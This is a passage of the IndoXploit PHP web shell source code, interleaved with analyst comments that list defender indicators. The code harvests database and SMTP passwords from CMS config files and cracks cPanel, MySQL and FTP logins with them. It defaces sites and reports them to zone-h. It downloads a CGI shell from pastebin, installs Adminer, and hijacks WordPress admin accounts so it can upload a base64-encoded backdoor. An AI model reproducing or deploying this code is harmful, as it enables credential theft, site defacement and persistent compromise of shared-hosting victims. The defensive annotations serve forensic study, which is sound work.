  948. $passcp = explode("\r\n", $_POST['pass_cp']);
  949. $i = 0;
  950. foreach($usercp as $ucp) {
  951. foreach($passcp as $pcp) {
  952. if(@mysql_connect('localhost', $ucp, $pcp)) {
  953. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  954. } else {
  955. $_SESSION[$ucp] = "1";
  956. $_SESSION[$pcp] = "1";
  957. if($ucp == '' || $pcp == '') {
  958.  
  959. } else {
  960. $i++;
  961. if(function_exists('posix_getpwuid')) {
  962. $domain_cp = file_get_contents("/etc/named.conf");
  963. if($domain_cp == '') {
  964. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  965. } else {
  966. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  967. foreach($domains_cp[1] as $dj) {
  968. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  969. $user_cp_url = $user_cp_url['name'];
  970. if($user_cp_url == $ucp) {
  971. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  972. break;
  973. }
  974. }
  975. }
  976. } else {
  977. $dom = "<font color=red>function is Disable by system</font>";
  978. }
  979. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  980. }
  981. }
  982. }
  983. }
  984. }
  985. if($i == 0) {
  986. } else {
  987. echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
  988. }
  989. } else {
  990. echo "<center>
  991. <form method='post'>
  992. USER: <br>
  993. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  994. $_usercp = fopen("/etc/passwd","r");
  995. while($getu = fgets($_usercp)) {
  996. if($getu == '' || !$_usercp) {
  997. echo "<font color=red>Can't read /etc/passwd</font>";
  998. } else {
  999. preg_match_all("/(.*?):x:/", $getu, $u);
  1000. foreach($u[1] as $user_cp) {
  1001. if(is_dir("/home/$user_cp/public_html")) {
  1002. echo "$user_cp\n";
  1003. }
  1004. }
  1005. }
  1006. }
  1007. echo "</textarea><br>
  1008. PASS: <br>
  1009. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  // [analysis] cp_pass($dir): credential-harvesting helper of the shell's "cpanel" action.
  // Reads every regular file directly inside $dir, picks a branch from a marker string
  // found in the file body, and collects the database password stored in that file.
  // The collected values are echoed one per line; the function has no return statement.
  // The surrounding branch prints this output into the "pass_cp" textarea, and on submit
  // each user/password pair is tried with mysql_connect('localhost', ...).
  // ambilkata() is defined outside this view; from its call sites it appears to return
  // the text between the two given delimiters (assumption, confirm against its definition).
  // NOTE(defender): every DB password in a directory of collected configs (for example the
  // idx_config/ folder written elsewhere in this file) should be treated as exposed and rotated.
  // A DB password that is also used as an account password is what this action depends on.
  1010. function cp_pass($dir) {
  1011. $pass = "";
  1012. $dira = scandir($dir);
  1013. foreach($dira as $dirb) {
  // only regular files are read; sub-directories are not descended into
  1014. if(!is_file("$dir/$dirb")) continue;
  1015. $ambil = file_get_contents("$dir/$dirb");
  // marker -> CMS mapping below follows the labels the auto_edit_user action of this file
  // prints for the same patterns (WordPress, Joomla, Magento, Lokomedia, OpenCart)
  1016. if(preg_match("/WordPress/", $ambil)) {
  1017. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1018. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1019. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1020. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1021. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1022. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1023. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1024. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1025. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  // branch keyed on a "client" marker and a password= line; presumably aimed at MySQL
  // client option files such as the .my.cnf this file collects elsewhere (confirm)
  1026. } elseif(preg_match("/^[client]$/", $ambil)) {
  1027. preg_match("/password=(.*?)/", $ambil, $pass1);
  1028. if(preg_match('/"/', $pass1[1])) {
  1029. $pass1[1] = str_replace('"', "", $pass1[1]);
  1030. $pass .= $pass1[1]."\n";
  1031. } else {
  1032. $pass .= $pass1[1]."\n";
  1033. }
  // cc_encryption_hash marker: presumably a WHMCS configuration.php (confirm)
  1034. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1035. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1036. }
  1037. }
  // output goes straight into the page (the open textarea of the calling form)
  1038. echo $pass;
  1039. }
  1040. $cp_pass = cp_pass($dir);
  1041. echo $cp_pass;
  1042. echo "</textarea><br>
  1043. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1044. </form>
  1045. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1046. }
  1047. } elseif($_GET['do'] == 'cpftp_auto') {
  1048. if($_POST['crack']) {
  1049. $usercp = explode("\r\n", $_POST['user_cp']);
  1050. $passcp = explode("\r\n", $_POST['pass_cp']);
  1051. $i = 0;
  1052. foreach($usercp as $ucp) {
  1053. foreach($passcp as $pcp) {
  1054. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1055. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1056. } else {
  1057. $_SESSION[$ucp] = "1";
  1058. $_SESSION[$pcp] = "1";
  1059. if($ucp == '' || $pcp == '') {
  1060. //
  1061. } else {
  1062. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  1063. $ftp_conn = ftp_connect($ip);
  1064. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  1065. if((!$ftp_login) || (!$ftp_conn)) {
  1066. echo "[+] <font color=red>Login Gagal</font><br><br>";
  1067. } else {
  1068. echo "[+] <font color=lime>Login Sukses</font><br>";
  1069. $fi = htmlspecialchars($_POST['file_deface']);
  1070. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  1071. if($deface) {
  1072. $i++;
  1073. echo "[+] <font color=lime>Deface Sukses</font><br>";
  1074. if(function_exists('posix_getpwuid')) {
  1075. $domain_cp = file_get_contents("/etc/named.conf");
  1076. if($domain_cp == '') {
  1077. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1078. } else {
  1079. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1080. foreach($domains_cp[1] as $dj) {
  1081. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1082. $user_cp_url = $user_cp_url['name'];
  1083. if($user_cp_url == $ucp) {
  1084. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  1085. break;
  1086. }
  1087. }
  1088. }
  1089. } else {
  1090. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1091. }
  1092. } else {
  1093. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  1094. }
  1095. }
  1096. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  1097. }
  1098. }
  1099. }
  1100. }
  1101. }
  1102. if($i == 0) {
  1103. } else {
  1104. echo "<br>sukses deface ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
  1105. }
  1106. } else {
  1107. echo "<center>
  1108. <form method='post'>
  1109. Filename: <br>
  1110. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  1111. Deface Page: <br>
  1112. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  1113. USER: <br>
  1114. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1115. $_usercp = fopen("/etc/passwd","r");
  1116. while($getu = fgets($_usercp)) {
  1117. if($getu == '' || !$_usercp) {
  1118. echo "<font color=red>Can't read /etc/passwd</font>";
  1119. } else {
  1120. preg_match_all("/(.*?):x:/", $getu, $u);
  1121. foreach($u[1] as $user_cp) {
  1122. if(is_dir("/home/$user_cp/public_html")) {
  1123. echo "$user_cp\n";
  1124. }
  1125. }
  1126. }
  1127. }
  1128. echo "</textarea><br>
  1129. PASS: <br>
  1130. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  // [analysis] cp_pass($dir): second copy of the credential-harvesting helper, declared
  // inside the "cpftp_auto" action. Reads every regular file directly inside $dir, selects
  // a branch by a marker string in the file body, and echoes the database passwords it
  // extracts, one per line; there is no return statement.
  // The surrounding branch prints the output into the "pass_cp" textarea; on submit the
  // pairs are tried with mysql_connect('localhost', ...) and, on success, with ftp_login().
  // ambilkata() is defined outside this view; from its call sites it appears to return
  // the text between the two given delimiters (assumption, confirm against its definition).
  // NOTE(defender): FTP logins from the web server's own address shortly after config files
  // were read across accounts are a useful correlation for this action; rotate any DB
  // password that doubles as an FTP or control-panel password.
  1131. function cp_pass($dir) {
  1132. $pass = "";
  1133. $dira = scandir($dir);
  1134. foreach($dira as $dirb) {
  // only regular files are read; sub-directories are not descended into
  1135. if(!is_file("$dir/$dirb")) continue;
  1136. $ambil = file_get_contents("$dir/$dirb");
  // marker -> CMS mapping below follows the labels the auto_edit_user action of this file
  // prints for the same patterns (WordPress, Joomla, Magento, Lokomedia, OpenCart)
  1137. if(preg_match("/WordPress/", $ambil)) {
  1138. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1139. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1140. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1141. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1142. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1143. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1144. $pass .= ambilkata($ambil,'password = "','"')."\n";
  1145. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1146. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  // branch keyed on a "client" marker and a password= line; presumably aimed at MySQL
  // client option files such as the .my.cnf this file collects elsewhere (confirm)
  1147. } elseif(preg_match("/client/", $ambil)) {
  1148. preg_match("/password=(.*)/", $ambil, $pass1);
  1149. if(preg_match('/"/', $pass1[1])) {
  1150. $pass1[1] = str_replace('"', "", $pass1[1]);
  1151. $pass .= $pass1[1]."\n";
  1152. }
  // cc_encryption_hash marker: presumably a WHMCS configuration.php (confirm)
  1153. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1154. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1155. }
  1156. }
  // output goes straight into the page (the open textarea of the calling form)
  1157. echo $pass;
  1158. }
  1159. $cp_pass = cp_pass($dir);
  1160. echo $cp_pass;
  1161. echo "</textarea><br>
  1162. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  1163. </form>
  1164. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1165. }
  1166. } elseif($_GET['do'] == 'smtp') {
  1167. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  // [analysis] scj($dir): helper of the shell's "smtp" action. Reads every regular file
  // directly inside $dir, removes all "$" characters from the text, and for files matching
  // the JConfig|joomla marker extracts the smtphost, smtpauth, smtpuser, smtppass, smtpport
  // and smtpsecure values and echoes them into the page. There is no return statement.
  // ambilkata() is defined outside this view; from its call sites it appears to return
  // the text between the two given delimiters (assumption, confirm against its definition).
  // NOTE(defender): mail-relay credentials stored in a Joomla configuration file that was
  // readable by this process should be treated as exposed: rotate them and review the
  // relay's logs for unexpected senders.
  1168. function scj($dir) {
  1169. $dira = scandir($dir);
  1170. foreach($dira as $dirb) {
  // only regular files are read; sub-directories are not descended into
  1171. if(!is_file("$dir/$dirb")) continue;
  1172. $ambil = file_get_contents("$dir/$dirb");
  // "$" is stripped so the delimiters below match the variable names without the sigil
  1173. $ambil = str_replace("$", "", $ambil);
  1174. if(preg_match("/JConfig|joomla/", $ambil)) {
  1175. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  1176. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  1177. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  1178. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  1179. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  1180. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  // extracted values are written into the HTML response as-is
  1181. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  1182. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  1183. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  1184. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  1185. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  1186. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  1187. }
  1188. }
  1189. }
  1190. $smpt_hunter = scj($dir);
  1191. echo $smpt_hunter;
  1192. } elseif($_GET['do'] == 'auto_wp') {
  1193. if($_POST['hajar']) {
  1194. $title = htmlspecialchars($_POST['new_title']);
  1195. $pn_title = str_replace(" ", "-", $title);
  1196. if($_POST['cek_edit'] == "Y") {
  1197. $script = $_POST['edit_content'];
  1198. } else {
  1199. $script = $title;
  1200. }
  1201. $conf = $_POST['config_dir'];
  1202. $scan_conf = scandir($conf);
  1203. foreach($scan_conf as $file_conf) {
  1204. if(!is_file("$conf/$file_conf")) continue;
  1205. $config = file_get_contents("$conf/$file_conf");
  1206. if(preg_match("/WordPress/", $config)) {
  1207. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1208. $dbuser = ambilkata($config,"DB_USER', '","'");
  1209. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1210. $dbname = ambilkata($config,"DB_NAME', '","'");
  1211. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1212. $prefix = $dbprefix."posts";
  1213. $option = $dbprefix."options";
  1214. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1215. $db = mysql_select_db($dbname);
  1216. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1217. $result = mysql_fetch_array($q);
  1218. $id = $result[ID];
  1219. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1220. $result2 = mysql_fetch_array($q2);
  1221. $target = $result2[option_value];
  1222. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1223. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1224. echo "<div style='margin: 5px auto;'>";
  1225. if($target == '') {
  1226. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1227. } else {
  1228. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1229. }
  1230. if(!$update OR !$conn OR !$db) {
  1231. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1232. } else {
  1233. echo "<font color=lime>sukses di ganti.</font><br>";
  1234. }
  1235. echo "</div>";
  1236. mysql_close($conn);
  1237. }
  1238. }
  1239. } else {
  1240. echo "<center>
  1241. <h1>Auto Edit Title+Content WordPress</h1>
  1242. <form method='post'>
  1243. DIR Config: <br>
  1244. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1245. Set Title: <br>
  1246. <input type='text' name='new_title' value='Hacked by IndoXploit' placeholder='New Title'><br><br>
  1247. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1248. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1249. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1250. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1251. </form>
  1252. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1253. ";
  1254. }
  1255. } elseif($_GET['do'] == 'zoneh') {
  1256. if($_POST['submit']) {
  1257. $domain = explode("\r\n", $_POST['url']);
  1258. $nick = $_POST['nick'];
  1259. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1260. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1261. function zoneh($url,$nick) {
        // Analyst note: submits a single domain to the zone-h defacement-notification form.
        //   $url  - value placed in the "domain1" form field
        //   $nick - value placed in the "defacer" form field
        // Returns the raw response body (CURLOPT_RETURNTRANSFER); the caller searches it
        // for an "OK" marker to decide what to print.
        // Both arguments are interpolated into the POST body as-is, with no URL-encoding.
        // Defender view: an outbound POST from a web server to this notify URL indicates
        // the host is already compromised and is being reported as defaced.
  1262. $ch = curl_init("http://www.zone-h.com/notify/single");
  1263. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1264. curl_setopt($ch, CURLOPT_POST, true);
  1265. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
        // The function returns here, so the curl_close() on the next line never runs.
  1266. return curl_exec($ch);
  1267. curl_close($ch);
  1268. }
  1269. foreach($domain as $url) {
  1270. $zoneh = zoneh($url,$nick);
  1271. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1272. echo "$url -> <font color=lime>OK</font><br>";
  1273. } else {
  1274. echo "$url -> <font color=red>ERROR</font><br>";
  1275. }
  1276. }
  1277. } else {
  1278. echo "<center><form method='post'>
  1279. <u>Defacer</u>: <br>
  1280. <input type='text' name='nick' size='50' value='0xCor3'><br>
  1281. <u>Domains</u>: <br>
  1282. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1283. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1284. </form>";
  1285. }
  1286. echo "</center>";
  1287. } elseif($_GET['do'] == 'cgi') {
  1288. $cgi_dir = mkdir('idx_cgi', 0755);
        // Analyst note for this branch (do=cgi): it creates the directory idx_cgi/ in the
        // current working directory, rewrites .htaccess, stores a remotely hosted script
        // as idx_cgi/cgi.izo, marks it executable and loads it in an iframe.
        // On-disk indicators visible here: idx_cgi/, idx_cgi/cgi.izo, and an .htaccess
        // whose only content is the AddHandler line below.
  1289. $file_cgi = "idx_cgi/cgi.izo";
  1290. $isi_htcgi = "AddHandler cgi-script .izo";
        // Mode "w" truncates any .htaccess already present in the working directory, so
        // the site's previous rules are lost; a missing or one-line .htaccess is itself a
        // useful integrity signal.
  1291. $htcgi = fopen(".htaccess", "w");
  1292. fwrite($htcgi, $isi_htcgi);
  1293. fclose($htcgi);
        // getsource() is defined outside this excerpt; presumably it returns the body of
        // the given URL - confirm against its definition. The content is written to disk
        // without any integrity check.
  1294. $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
  1295. $cgi = fopen($file_cgi, "w");
  1296. fwrite($cgi, $cgi_script);
  1297. fclose($cgi);
  1298. chmod($file_cgi, 0755);
  1299. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1300. } elseif($_GET['do'] == 'fake_root') {
  1301. ob_start();
  1302. $cwd = getcwd();
  1303. $ambil_user = explode("/", $cwd);
  1304. $user = $ambil_user[2];
  1305. if($_POST['reverse']) {
  1306. $site = explode("\r\n", $_POST['url']);
  1307. $file = $_POST['file'];
  1308. foreach($site as $url) {
  1309. $cek = getsource("$url/~$user/$file");
  1310. if(preg_match("/hacked/i", $cek)) {
  1311. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  1312. }
  1313. }
  1314. } else {
  1315. echo "<center><form method='post'>
  1316. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1317. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1318. Domain: <br>
  1319. <textarea style='width: 450px; height: 250px;' name='url'>";
  1320. reverse($_SERVER['HTTP_HOST']);
  1321. echo "</textarea><br>
  1322. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1323. </form><br>
  1324. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1325. }
  1326. } elseif($_GET['do'] == 'adminer') {
  1327. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1328. function adminer($url, $isi) {
        // Analyst note: downloads $url with cURL and writes the response into the local
        // file $isi (opened with mode "w", so an existing file is truncated).
        //   $url - remote file to fetch
        //   $isi - local path that receives the download
        // Returns the result of curl_exec().
        // The only call in this excerpt passes an Adminer 4.2.4 download URL and the name
        // "adminer.php". Defender view: an adminer.php that nobody on the team installed,
        // sitting in a web-served directory, is a database administration interface
        // placed there by an intruder.
  1329. $fp = fopen($isi, "w");
  1330. $ch = curl_init();
  1331. curl_setopt($ch, CURLOPT_URL, $url);
  1332. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1333. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        // Certificate verification is switched off, so the downloaded file is not
        // authenticated against the server it claims to come from.
  1334. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1335. curl_setopt($ch, CURLOPT_FILE, $fp);
        // Everything after this return (curl_close, fclose, ob_flush, flush) is unreachable.
  1336. return curl_exec($ch);
  1337. curl_close($ch);
  1338. fclose($fp);
  1339. ob_flush();
  1340. flush();
  1341. }
  1342. if(file_exists('adminer.php')) {
  1343. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1344. } else {
  1345. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1346. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1347. } else {
  1348. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1349. }
  1350. }
  1351. } elseif($_GET['do'] == 'auto_dwp') {
  1352. if($_POST['auto_deface_wp']) {
  1353. function anucurl($sites) {
        // Analyst note: plain HTTP(S) fetch helper.
        //   $sites - URL to request
        // Returns the response body as a string (CURLOPT_RETURNTRANSFER), following redirects.
        // Network indicators visible here: a fixed Firefox 32 / Windows NT 6.1 User-Agent
        // string and a 5-second connect timeout.
        // On-disk indicator: a cookie jar named cookie.txt in the working directory, used
        // for both reading and writing session cookies.
  1354. $ch = curl_init($sites);
  1355. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1356. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1357. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1358. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
        // Both certificate checks are disabled: any TLS certificate is accepted.
  1359. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1360. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1361. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1362. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1363. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1364. $data = curl_exec($ch);
  1365. curl_close($ch);
  1366. return $data;
  1367. }
  1368. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
        // Analyst note: submits a WordPress-style login form.
        //   $cek       - URL the form is POSTed to (the caller passes "$target/wp-login.php")
        //   $web       - value for the redirect_to field
        //   $userr     - value for the log (username) field
        //   $pass      - value for the pwd (password) field
        //   $wp_submit - value for the wp-submit button field
        // Returns the response body after following redirects.
        // Session cookies are stored in cookie.txt in the working directory, so a leftover
        // cookie.txt next to unexpected PHP files is a forensic artefact of this routine.
  1369. $post = array(
  1370. "log" => "$userr",
  1371. "pwd" => "$pass",
  1372. "rememberme" => "forever",
  1373. "wp-submit" => "$wp_submit",
  1374. "redirect_to" => "$web",
  1375. "testcookie" => "1",
  1376. );
  1377. $ch = curl_init($cek);
  1378. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1379. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1380. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
        // TLS certificate and host-name verification are both turned off.
  1381. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1382. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1383. curl_setopt($ch, CURLOPT_POST, 1);
        // Passing an array makes cURL send the body as multipart/form-data.
  1384. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1385. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1386. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1387. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1388. $data = curl_exec($ch);
  1389. curl_close($ch);
  1390. return $data;
  1391. }
  1392. $scan = $_POST['link_config'];
        // Analyst note: $scan is a directory path taken straight from the request; every
        // regular file in it is later read and searched for WordPress database settings.
  1393. $link_config = scandir($scan);
  1394. $script = htmlspecialchars($_POST['script']);
        // Hard-coded replacement credentials. Further down, the first row of the users
        // table (ordered by id) is overwritten with user_login = $user and
        // user_pass = md5($pass), i.e. an unsalted 32-hex-character MD5 digest.
        // Defender view: a WordPress users row whose login is "indoxploit", or whose
        // user_pass is a bare 32-character hex string, is a database indicator of this
        // routine having run.
  1395. $user = "indoxploit";
  1396. $pass = "indoxploit";
  1397. $passx = md5($pass);
  1398. foreach($link_config as $dir_config) {
  1399. if(!is_file("$scan/$dir_config")) continue;
  1400. $config = file_get_contents("$scan/$dir_config");
  1401. if(preg_match("/WordPress/", $config)) {
  1402. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1403. $dbuser = ambilkata($config,"DB_USER', '","'");
  1404. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1405. $dbname = ambilkata($config,"DB_NAME', '","'");
  1406. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1407. $prefix = $dbprefix."users";
  1408. $option = $dbprefix."options";
  1409. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1410. $db = mysql_select_db($dbname);
  1411. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1412. $result = mysql_fetch_array($q);
  1413. $id = $result[ID];
  1414. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1415. $result2 = mysql_fetch_array($q2);
  1416. $target = $result2[option_value];
  1417. if($target == '') {
  1418. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1419. } else {
  1420. echo "[+] $target <br>";
  1421. }
  1422. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1423. if(!$conn OR !$db OR !$update) {
  1424. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1425. mysql_close($conn);
  1426. } else {
  1427. $site = "$target/wp-login.php";
  1428. $site2 = "$target/wp-admin/theme-install.php?upload";
  1429. $b1 = anucurl($site2);
  1430. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1431. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1432. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1433. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1434. $www = "m.php";
  1435. $fp5 = fopen($www,"w");
  1436. fputs($fp5,$upload3);
  1437. $post2 = array(
  1438. "_wpnonce" => "$anu2",
  1439. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1440. "themezip" => "@$www",
  1441. "install-theme-submit" => "Install Now",
  1442. );
  1443. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1444. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1445. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1446. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1447. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1448. curl_setopt($ch, CURLOPT_POST, 1);
  1449. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1450. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1451. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1452. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
